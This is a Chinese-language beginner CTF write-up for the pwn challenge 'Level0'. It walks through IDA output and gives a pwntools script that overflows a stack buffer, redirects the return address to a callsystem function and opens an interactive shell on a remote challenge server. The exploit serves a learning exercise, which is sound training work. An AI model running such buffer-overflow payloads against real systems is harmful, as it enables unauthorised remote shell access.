当前位置：网站首页>PWN新手入门Level0

PWN新手入门Level0

2022-06-29 02:31:00 【Day-3】

在这里插入图片描述
首先查看一下文件格式属性。

运行一下看一看。

丢入IDA中，查看代码。

在这里插入图片描述

int __cdecl main(int argc, const char **argv, const char **envp)
{
    
  write(1, "Hello, World\n", 0xDuLL);
  return vulnerable_function();
}

进入函数看一眼。
在这里插入图片描述

同时我们也发现了进入服务器的函数。
在这里插入图片描述

我们只需要将read函数中ret改为callsystem的地址，就可以进入服务器了。
编写源代码：

from pwn import *
context(os='Linux',arch="amd64",log_level="debug")
content = 0 

elf = ELF("Level0")
system_addr = elf.symbols["callsystem"] # 0x400596

def main():
	if content == 1:
		day3 = process("Level0")
	else:
		day3 =remote("111.200.241.244",58272)
	payload = b'a' * (0x80 + 8) + p64(system_addr)
	
	day3.recvuntil("Hello, World\n")
	day3.sendline(payload)
	
	day3.interactive()

main()